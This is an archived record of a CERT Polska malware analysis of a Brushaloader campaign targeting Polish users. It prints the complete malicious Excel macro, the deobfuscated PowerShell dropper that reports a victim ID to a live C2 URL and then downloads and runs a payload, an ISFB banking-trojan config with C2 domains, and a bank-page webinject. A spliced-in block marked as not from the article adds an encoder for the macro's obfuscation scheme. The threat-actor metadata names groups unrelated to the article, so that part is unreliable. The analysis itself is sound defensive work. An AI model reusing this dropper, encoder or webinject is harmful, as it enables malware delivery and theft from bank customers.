{
	"id": "97028d23-72a7-4051-a3c4-7b4eaeca75a4",
	"created_at": "2026-04-06T00:21:37.29759Z",
	"updated_at": "2026-04-10T13:12:31.080518Z",
	"deleted_at": null,
	"sha1_hash": "958f3ade65029a0782f7f2761aebcc7dce4dc321",
	"title": "Brushaloader gaining new layers like a pro",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 294033,
	"plain_text": "Brushaloader gaining new layers like a pro\r\nArchived: 2026-04-05 23:06:43 UTC\r\nYo dawg, I heard you like droppers so I put a dropper in your dropper\r\nOn 2019-11-18 we received a report that some Polish users had begun receiving malspam imitating DHL:\r\nIn this short article, we’ll take a look at the xls document that has been used as a (1st stage) dropper distributing another well-known (2nd stage) dropper – brushaloader.\r\nSamples analysed:\r\n6a101103486e67f1d8839edd18da773bd9b665ab3df650c9882245d0ee712b8e – 25163275820.xls\r\n627294cf0495d2daf8d543aca74bf3cf684673c6a32b8ebf6649f882b362a11a – brushaloader printhpp.vbe\r\nf25bee3bfe185c6df0ce25cf738f1cc9c72a9ea7f33f6f7545e73d2f3d79b5f8 – brushaloader drop (isfb dll)\r\nWhile the embedded links did not lead to anything interesting, there was also an .xls file attached, let’s try opening it up:\r\nhttps://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/\r\nPage 1 of 10\n\nInteresting…\r\nPoking around, we noticed that some cells contain text whose contents were hidden with formatting: the font size was set to 2 and the font color to white.\r\nLet’s fetch the macro contents to see what’s going on under the hood:\r\n➜ ~ olevba 25163275820.xls\r\nConst leftt = 5\r\nFunction cobos()\r\n    oko = Left((sokia), 2) + 0\r\n    cobos = Cells(oko, oko)\r\nEnd Function\r\nSub toro()\r\n    Dim boll As Workbook\r\n    Set boll = Workbooks.Add\r\nEnd Sub\r\nSub comaro()\r\n    G = \"0\"\r\n    If Mid(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4, 1) = G Then corecc\r\nEnd Sub\r\nFunction frug()\r\n    frug = Zero + False\r\nEnd Function\r\nFunction afa()\r\n    afa = msoLanguageIDUI\r\nEnd Function\r\nFunction sokia()\r\n    sokia = Application.LanguageSettings.LanguageID(afa)\r\nEnd Function\r\nFunction corecc()\r\n    If sokia = 209 * leftt Then Shell venus, msoSyncConflictClientWins\r\n    toro\r\nEnd Function\r\nFunction venus()\r\n    Dim des, kes As String: des = \"\": kes = des\r\n    For t = leftt To 8\r\n        des = des + Zerro(Cells(t, leftt - 1))\r\n    Next t\r\n    For w = leftt To 8\r\n        kes = kes + Zerro(Cells(w, leftt))\r\n    Next w\r\n    venus = des + cobos \u0026 kes\r\nEnd Function\r\nFunction Zerro(ByVal finde As String) As String\r\n    J = 1\r\n    Dim CGu, subb, hole As Integer\r\n    Dim Nnul As Integer\r\n    Dim arrg() As Integer\r\n    Dim vexel() As Long\r\n    subb = IIf(Right(finde, 1) Mod 2 = frug, leftt, leftt - J)\r\n    finde = Left(finde, Len(finde) - IIf(Right(finde, 1) Mod 2 = frug, J, J))\r\n    hole = Len(finde) / subb - J\r\n    ReDim arrg(hole): ReDim vexel(hole)\r\n    Nnul = frug: CGu = frug\r\n    For CGu = frug To hole\r\n        arrg(CGu) = CGu - (hole + J)\r\n    Next CGu\r\n    For Nnul = frug To hole\r\n        For CGu = frug To hole\r\n            If CInt(Mid(finde, CGu * subb + J, subb - 3)) = Nnul Then\r\n                vexel(Nnul) = (Mid(finde, (CGu + J) * subb - 2, 3) + arrg(Nnul))\r\n                Exit For\r\n            End If\r\n        Next CGu\r\n    Next Nnul\r\n    Zerro = \"\" + \"\"\r\n    For Nnul = frug To hole\r\n        Zerro = Zerro \u0026 Chr(vexel(Nnul))\r\n    Next Nnul\r\nEnd Function\r\nPrivate Sub borderstyle_Layout()\r\n    Debug.Print: ThisWorkbook.comaro: Debug.Print \"\"\r\nEnd Sub\r\nPrivate Sub prnt_Click()\r\n    Debug.Print \"\": ThisWorkbook.comaro:\r\nEnd Sub\r\nThe above is the complete source code of the macros embedded in the spreadsheet. Taking a closer look, we can identify several interesting snippets:\r\nPrivate Sub prnt_Click()\r\n    Debug.Print \"\": ThisWorkbook.comaro:\r\nEnd Sub\r\nThe print button does nothing visible to the user, which probably serves to encourage victims to enable macros in the document; its handler (like the borderstyle_Layout event) simply calls comaro. Note that comaro additionally checks that the character five positions from the end of the workbook name (the last digit of 25163275820.xls) is 0, so a renamed copy of the document does nothing at all.\r\nConst leftt = 5\r\n...\r\nFunction afa()\r\n    afa = msoLanguageIDUI\r\nEnd Function\r\nFunction sokia()\r\n    sokia = Application.LanguageSettings.LanguageID(afa)\r\nEnd Function\r\nFunction corecc()\r\n    If sokia = 209 * leftt Then Shell venus, msoSyncConflictClientWins\r\n    toro\r\nEnd Function\r\nThe payload will only run if the Office UI language is Polish (LanguageID 1045 = 209 * 5); on any other locale the macro just opens a new blank workbook (toro) and exits.\r\nConst leftt = 5\r\n...\r\nFunction cobos()\r\n    oko = Left((sokia), 2) + 0\r\n    cobos = Cells(oko, oko)\r\nEnd Function\r\nFunction venus()\r\n    Dim des, kes As String: des = \"\": kes = des\r\n    For t = leftt To 8\r\n        des = des + Zerro(Cells(t, leftt - 1))\r\n    Next t\r\n    For w = leftt To 8\r\n        kes = kes + Zerro(Cells(w, leftt))\r\n    Next w\r\n    venus = des + cobos \u0026 kes\r\nEnd Function\r\nThe program fetches values from cells D5:D8 and E5:E8 (columns leftt - 1 and leftt, rows 5 to 8) and J10 (cobos: the first two digits of the language id, 10, used as both row and column), which match the hidden cells we observed earlier.\r\nThe contents of D5:D8 and E5:E8 are decoded with Zerro and concatenated around the verbatim content of J10 using a custom algorithm. 
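As an added example, not code from the original article, here is a Python port of the Zerro() cell decoder and the venus() assembly logic as read off the macro above, plus a constructed inverse encoder that exists only to build sample cells, because the actual hidden cell contents of 25163275820.xls are not reproduced on this page. The decoding rules come from the VBA: the last character of a cell is a flag digit (even selects 5-character chunks, odd 4-character chunks), every chunk is an index followed by a 3-digit value, chunks may be stored in any order, the real character code is value + index - chunk_count, and J10 is appended between the two decoded halves without decoding. The sample cell strings and the command they encode are assumptions for illustration.

```python
import random

# Added example (not from the original article): Python port of the Zerro()
# and venus() logic of the macro. Decoding rules, read off the VBA:
#  - the last character of a cell is a flag digit: even -> 5-char chunks (leftt),
#    odd -> 4-char chunks (leftt - 1); the flag is then stripped;
#  - each chunk is <index><3-digit value>; chunks may be stored in any order;
#  - real char code = value + index - number_of_chunks (arrg(Nnul) in the VBA).

def zerro(cell):
    chunk = 5 if int(cell[-1]) % 2 == 0 else 4
    body = cell[:-1]
    n = len(body) // chunk            # hole + 1 in the VBA
    idx_width = chunk - 3             # digits of index per chunk (1 or 2)
    out = []
    for nnul in range(n):
        code = 0                      # VBA leaves vexel(Nnul) = 0 when no chunk matches
        for cgu in range(n):
            piece = body[cgu * chunk:(cgu + 1) * chunk]
            if int(piece[:idx_width]) == nnul:
                code = int(piece[idx_width:]) + (nnul - n)
                break
        out.append(chr(code))
    return ''.join(out)

def venus(cells):
    # cells maps A1-style references to cell strings. D5:D8 and E5:E8 are
    # decoded; J10 (cobos: Left(1045, 2) = 10) is appended in clear between them.
    des = ''.join(zerro(cells['D%d' % row]) for row in range(5, 9))
    kes = ''.join(zerro(cells['E%d' % row]) for row in range(5, 9))
    return des + cells['J10'] + kes

def zerro_encode(text, seed=0):
    # Constructed inverse of zerro(), used only to build sample cells here.
    # The index must fit in chunk - 3 digits: up to 10 chars with 4-char chunks,
    # up to 100 with 5-char chunks (the VBA decoder has the same limits).
    n = len(text)
    chunk = 4 if n <= 10 else 5
    idx_width = chunk - 3
    pieces = [str(i).zfill(idx_width) + str(ord(ch) + n - i).zfill(3)
              for i, ch in enumerate(text)]
    random.Random(seed).shuffle(pieces)   # chunk order is irrelevant to the decoder
    flag = '2' if chunk == 5 else '7'
    return ''.join(pieces) + flag

def demo():
    # Constructed cells standing in for D5:D8, J10 and E5:E8 of the sample;
    # the real cell contents are not reproduced on this page.
    d_parts = ['PoWershelL ', '-NoProfile ', '-ExecutionPolicy ', 'Bypass ']
    e_parts = [' -Command ', 'Start-Process ', 'calc', '.exe']
    cells = {'D%d' % (5 + i): zerro_encode(p, seed=i) for i, p in enumerate(d_parts)}
    cells.update({'E%d' % (5 + i): zerro_encode(p, seed=10 + i) for i, p in enumerate(e_parts)})
    cells['J10'] = '-NonInteractive'      # stored in clear, like the real J10
    return venus(cells)

if __name__ == '__main__':
    print(demo())
```

The demo reproduces the D5:D8 + J10 + E5:E8 layout of the real venus(), so a cell dump from a similar document can be fed to venus() directly once the cell references are mapped into the dict; a cell whose chunks carry an index outside the range decodes to NUL bytes, exactly as the VBA would produce.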
The result of decoding the real cells is a PowerShell script:\r\nPoWershelL -noniNtER -W 000000000000000000000000000000000000000000000001 -exEcuTIonPOlic BYpAsS -NopRofi \"\\\".( `$VErbOS\r\n'TVZpj6NIEv0rVms11SW6ixvskeYDmNscNoeN3RqpMWDMfdocvfXfN9OzrV3JzosX8SJfJkGsvq7++PrlF/H5C/v8hX9+WX2/rd6+v317s6\r\n)\"\\\" +([CHaR]44).TOSTRing()+ \"\\\" [IO.ComPREssioN.comprESsIOnmoDE]::deCoMPRess ) ) \"\\\" +([CHaR]44).TOSTRing()+ \"\\\" [TEXt.eN\r\nThe base64 blob is a raw deflate stream (as produced by .NET’s DeflateStream, without a zlib header), so decompressing it is easily achieved with the following Python script; wbits = -15 tells zlib to expect raw deflate data:\r\nimport base64\r\nimport zlib\r\n\r\nencoded = \"TVZpj6NIEv0rVms11...\"\r\ndecoded = base64.b64decode(encoded)\r\n# -15: raw deflate stream without zlib header or checksum\r\ndecompressed = zlib.decompress(decoded, -15)\r\nwith open('output', 'wb') as f:\r\n    f.write(decompressed)\r\nRunning the script yields the following results:\r\n( \u0026(\"{2}{0}{1}\" -f '-','ObJEcT','nEW') (\"{4}{0}{3}{2}{1}{5}\" -f'ySt','De','Mrea','em.iO.sTrEa','S','R')((\u0026(\"{0}{1}{2}\"-f 'n','EW-','ObJEcT'\r\nf'BqK8O8PL9e3DOza','oSQTxj3qX22DBeNY3QCLM5+Xpm0hpt2BX5NbKMIy73H9hF1TVbTyy','ftM0s6HI5TJz','5ooLFtgI+rfXrSqBilEi\r\n,[IO.coMPresSioN.cOmpreSsIONmOdE]::\"D`ecO`MprEss\" )),[sySTem.teXT.ENcODINg]::\"AS`cII\") ).(\"{0}{1}\" -f'ReADTOE','nd').Invoke\r\nThe resulting script is obfuscated with PowerShell’s -f format operator, which reassembles each string from shuffled fragments (for example (\"{2}{0}{1}\" -f '-','ObJEcT','nEW') evaluates to nEW-ObJEcT). We can clean it up with another quick Python script that performs the same reordering statically:\r\nimport re\r\nimport sys\r\n\r\n# matches (\"{2}{0}{1}\" -f 'a','b','c') and captures the index list and the fragment list\r\nstring_format = '''\\\\(\"((\\\\{\\\\d+\\\\})+)\"\\\\s*-f\\\\s*('.*?')\\\\)'''\r\n\r\ndef reformat(match):\r\n    items = list(map(int, match.group(1)[1:-1].split('}{')))\r\n    strings = match.group(3)[1:-1].split('\\',\\'')\r\n    return '\"' + ''.join(strings[x] for x in items) + '\"'\r\n\r\nwith open(sys.argv[1]) as f:\r\n    data = f.read()\r\nprint(re.sub(string_format, reformat, data))\r\nWhich gives us another PowerShell script with a large base64 blob that contains the next layer:\r\n( \u0026\"nEW-ObJEcT\" \"SyStem.iO.sTrEaMreaDeR\"((\u0026\"nEW-ObJEcT\" \"sYSTem.IO.comPResSiON.dEfLAteSTrEAm\"( [Io.MEMORysTREAM\r\n[CONVErt]::\"frOmBASE64STRIng\".Invoke(\"pVZpc+JGEP0rKoqspABjDuNsTFGOl8uu9UEMa6eWkNUgBpCty6PBlzz/Pd0zksBJvoUPgx\r\n,[IO.coMPresSioN.cOmpreSsIONmOdE]::\"D`ecO`MprEss\" )),[sySTem.teXT.ENcODINg]::\"AS`cII\") ).\"ReADTOEnd\".Invoke() |\u0026( ${eN`V\r\nBase64-decoding and inflating the blob, then cleaning it up again, gives us yet another PowerShell script:\r\nfunction W`D(${Q}){${B} = ${q}.ToCharArray();Foreach (${E`l} in ${B}) {${c} = ${C} + \"\" +\r\n[System.String]::Format(\"{0:X2}\", [System.Convert]::ToUInt32(${e`l}))}${c}};${dF}=.\"Get-WMIObject\" -class \"win32_PhysicalMedia\";${E`ZA}=\r\n[Text.Encoding]::UTF8;${a}='';${s`Er}=foreach(${df} in ${dF})\r\n{${A}=${A}+${d`F}.SerialNumber};${E}=.('wd')(${a});.('SV') ('j') (\u0026\"New-Object\"\r\n\"Net.WebClient\");.('Sv') \"qW3\" \"https://reloffersstart.co/ss.php?$e\";function G`H(${sG}){${Tg}=\r\n[Convert]::FromBase64String(${S`G});return ${Tg}};${p`P}=(\u0026\"New-Object\" \"IO.StreamReader\"\r\n(.\"New-Object\" \"IO.Compression.GzipStream\"((.\"New-Object\" \"IO.MemoryStream\"(,(([byte[]]\r\n(.\"Variable\" ('j')).Value.DownloadData((.('Gi') \"Variable:/qW3\").Value))))),\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();${F5}=${Pp}.substring(0,5)+\r\n(${pp} -replace '.*?(?=.{1,5}$)').trim();${P`P}=(${p`p} -replace \".{5}$\") -replace \"^.\r\n{5}\";foreach(${o`H} in ${P`P}){${ok}=@();${f`s}=${F5}.ToCharArray();${OH}=.('gh')\r\n(${OH});for(${Z}=0;${z} -lt ${O`h}.count;${z}++){${ok}+=[char]([Byte]${O`h}[${z}] -\r\nbxor[Byte]${F`S}[${z}%${f`S}.count])}};${M`k}=(\u0026\"Gci\" -path (((${e`NV:T`EmP}.tostring()))) |\r\n.\"Where-Object\" { ${_}.PSIsContainer }|.\"select\" \"fullname\" |.\"Get-Random\" -count 1).FullName+\r\n((\"bj2printhpp.vbe\").REpLAce(([CHaR]98+[CHaR]106+[CHaR]50),[StrinG][CHaR]92));\r\n[io.file]::WriteAllText(${m`K},(${E`za}.GetString((\u0026('gh')(((\u0026\"New-Object\" \"IO.StreamReader\"\r\n(\u0026\"New-Object\" \"IO.Compression.GzipStream\"((\u0026\"New-Object\" \"IO.MemoryStream\"(,(\u0026('gh')\r\n(${Ok})))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))))));if((\u0026\"gci\"\r\n${m`K}).Length -lt 5){exit};[System.Diagnostics.Process]::Start(${M`K})|.\"out-null\";\u0026\"sleep\" 25;.\r\n('ls');[io.file]::WriteAllLines(${M`K},[regex]::replace(${E},'\\D','1'));\r\nAfter some manual formatting we ended up with the script below:\r\nfunction W`D(${Q}){\r\n    ${B} = ${q}.ToCharArray();\r\n    Foreach (${E`l} in ${B}) {\r\n        ${c} = ${C} + \"\" + [System.String]::Format(\"{0:X2}\", [System.Convert]::ToUInt32(${e`l}))\r\n    }\r\n    ${c}\r\n};\r\n${dF}=.\"Get-WMIObject\" -class \"win32_PhysicalMedia\";\r\n${E`ZA}=[Text.Encoding]::UTF8;\r\n${a}='';\r\n${s`Er}=foreach(${df} in ${dF}){${A}=${A}+${d`F}.SerialNumber};\r\n${E}=.('wd')(${a});\r\n.('SV') ('j') (\u0026\"New-Object\" \"Net.WebClient\");\r\n.('Sv') \"qW3\" \"https://reloffersstart.co/ss.php?$e\";\r\nfunction G`H(${sG}){\r\n    ${Tg}=[Convert]::FromBase64String(${S`G});\r\n    return ${Tg}\r\n};\r\n${p`P}=(\u0026\"New-Object\" \"IO.StreamReader\"(.\"New-Object\" \"IO.Compression.GzipStream\"((.\"New-Object\" \"IO.MemoryStream\"(,(([byte[]](.\"Variable\" ('j')).Value.DownloadData((.('Gi') \"Variable:/qW3\").Value))))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\n${F5}=${Pp}.substring(0,5)+ (${pp} -replace '.*?(?=.{1,5}$)').trim();\r\n${P`P}=(${p`p} -replace \".{5}$\") -replace \"^.{5}\";\r\nforeach(${o`H} in ${P`P}){\r\n    ${ok}=@();\r\n    ${f`s}=${F5}.ToCharArray();\r\n    ${OH}=.('gh')(${OH});\r\n    for(${Z}=0; ${z} -lt ${O`h}.count; ${z}++){\r\n        ${ok}+=[char]([Byte]${O`h}[${z}] -bxor[Byte]${F`S}[${z}%${f`S}.count])\r\n    }\r\n};\r\n${M`k}=(\u0026\"Gci\" -path (((${e`NV:T`EmP}.tostring()))) | .\"Where-Object\" { ${_}.PSIsContainer }|.\"select\" \"fullname\" |.\"Get-Random\" -count 1).FullName+((\"bj2printhpp.vbe\").REpLAce(([CHaR]98+[CHaR]106+[CHaR]50),[StrinG][CHaR]92));\r\n[io.file]::WriteAllText(${m`K},(${E`za}.GetString((\u0026('gh')(((\u0026\"New-Object\" \"IO.StreamReader\"(\u0026\"New-Object\" \"IO.Compression.GzipStream\"((\u0026\"New-Object\" \"IO.MemoryStream\"(,(\u0026('gh')(${Ok})))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))))));\r\nif((\u0026\"gci\" ${m`K}).Length -lt 5){exit};\r\n[System.Diagnostics.Process]::Start(${M`K})|.\"out-null\";\r\n\u0026\"sleep\" 25;\r\n.('ls');\r\n[io.file]::WriteAllLines(${M`K},[regex]::replace(${E},'\\D','1'));\r\nIn short, the script concatenates the serial numbers of all physical drives (Win32_PhysicalMedia), hex-encodes the result to form a unique victim id and submits it to the C2 in the query string. The response is gzip-compressed; its first and last five characters form the XOR key for the base64 payload in between, which decodes to the first-stage VBS of a normal brushaloader campaign. The script writes it as printhpp.vbe into a randomly chosen subdirectory of %TEMP%, runs it, waits 25 seconds and then overwrites the file with the digits of the victim id, so the dropped script does not stay on disk for long.\r\nIt can be easily fetched, decrypted and decoded using this nifty Python script, with some help from our malware-analysis library – malduck:\r\nimport requests\r\nimport malduck\r\nfrom base64 import b64decode\r\nimport gzip\r\nimport os\r\n\r\n# url fetched from sample\r\nurl = 'https://reloffersstart.co/ss.php'\r\n# the real client sends the hex-encoded drive serials; any hex string will do\r\nmy_disk_id = os.urandom(32).hex()\r\n# avoid causing a scene: mimic the PowerShell user agent\r\nheaders = {\r\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.15063; en-US) PowerShell/6.0.0'\r\n}\r\n# ¯\\_(ツ)_/¯  (socks5h so that DNS resolution also goes through the proxy; needs requests[socks])\r\nproxies = {\r\n    'http': 'socks5h://localhost:9050',\r\n    'https': 'socks5h://localhost:9050'\r\n}\r\nr = requests.get(f'{url}?{my_disk_id}', proxies=proxies, headers=headers)\r\n# the original response is gzipped\r\nresponse = gzip.decompress(r.content)\r\n# the xor key is composed of the first and last 5 bytes\r\nkey = response[:5] + response[-5:]\r\npayload = response[5:-5]\r\ndecrypted = malduck.xor(key, b64decode(payload))\r\n# additional compression + encoding for some reason: base64 -> gzip -> base64\r\nfinal_payload = b64decode(gzip.decompress(b64decode(decrypted)))\r\nwith open('printhpp.vbe', 'w') as f:\r\n    f.write(final_payload.decode('utf-8'))\r\nBrushaloader has been described extensively in the past by Proofpoint and Talos, nothing new here.\r\nLet’s focus on the dropped binary instead. Brushaloader used to distribute Danabot (botnet no. 3) in Poland, but some time ago we observed a shift to ISFB v2.\r\nFor this particular sample the config is as follows:\r\n{\r\n  \"compilation_date\": \"Nov 5 2019\",\r\n  \"tor64_dll\": \"google.com file://%appdata%/system64.dll\",\r\n  \"botnet\": 1000,\r\n  \"sendtimeout\": 300,\r\n  \"bctimeout\": 10,\r\n  \"ssl\": true,\r\n  \"configfailtimeout\": 30,\r\n  \"dga_seed\": 1,\r\n  \"dga_base_url\": \"constitution.org/usdeclar.txt\",\r\n  \"key\": \"WIdtM3YCfxhwrbV1\",\r\n  \"dga_lsa_seed\": 3988359472,\r\n  \"server\": 12,\r\n  \"dga_count\": 5,\r\n  \"configtimeout\": 300,\r\n  \"public_key\": {\r\n    \"e\": 65537,\r\n    \"n\": \"2725621389245588428706735738158507614960965498383362980023038125231728833580944752096318564227427417832244994566\r\n  },\r\n  \"type\": \"isfb\",\r\n  \"dga_tld\": [\r\n    \".com\",\r\n    \".ru\",\r\n    \".org\"\r\n  ],\r\n  \"knockertimeout\": 300,\r\n  \"xcookie\": -1,\r\n  \"timer\": 60,\r\n  \"exe_type\": \"worker\",\r\n  \"ip_service\": \"curlmyip.net\",\r\n  \"tasktimeout\": 300,\r\n  \"tor32_dll\": \"google.com file://%appdata%/system32.dll\",\r\n  \"version\": \"2.16.098\",\r\n  \"domains\": [\r\n    {\r\n      \"cnc\": \"http://ey7kuuklgieop2pq.onion\\n\"\r\n    },\r\n    {\r\n      \"cnc\": \"http://maiamirainy.at\"\r\n    },\r\n    {\r\n      \"cnc\": \"http://drunt.at\"\r\n    }\r\n  ],\r\n  \"dga_season\": 10,\r\n  \"dga_crc\": 1320669898\r\n}\r\nThe static config is used to download webinjects and redirects targeting Polish banking sites and email providers.\r\nACTION: REDIRECT - Target: https://*test1/my9rep/* -\u003e http://nesssellbuyt.xyz/hc/\r\nACTION: REDIRECT - Target: https://*css15/home/* -\u003e http://nesssellbuyt.xyz/newstyle/\r\nset_url https://\u003cREDACTED\u003e/*\r\nreplace: \u003c/title\u003e\r\ninject:\r\n\u003c/title\u003e\r\n\u003cscript id=\"myjs1\" src=\"test1/my9rep/myjs28_frr_s35.js?bb=@ID@\" data-botid=\"@ID@\"\u003e\u003c/script\u003e\r\n\u003cscript id=\"myjs2\"\u003e\r\ndocument.getElementById(\"myjs1\").parentNode.removeChild(document.getElementById(\"myjs1\"));\r\ndocument.getElementById(\"myjs2\").parentNode.removeChild(document.getElementById(\"myjs2\"));\r\n\u003c/script\u003e\r\nend_inject\r\nThe injected tag loads the bot-specific JavaScript from a test1/my9rep/ path on the targeted site, which the first redirect rule above serves from nesssellbuyt.xyz instead, and the second inline script then removes both script elements from the DOM to hide the injection.\r\nIf you’re interested in receiving information about webinjects targeted at your domain, you might want to check out our injects sharing website: injects.cert.pl\r\nThat’s it, if you have any additional questions do not hesitate to reach out to us at @CERT_Polska_en or info@cert.pl\r\nThanks to Kafeine from Proofpoint for the ISFB sample.\r\nSource: https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/"
	],
	"report_names": [
		"brushaloader-gaining-new-layers-like-a-pro"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434897,
	"ts_updated_at": 1775826751,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.pdf",
		"text": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.txt",
		"img": "https://archive.orkl.eu/958f3ade65029a0782f7f2761aebcc7dce4dc321.jpg"
	}
}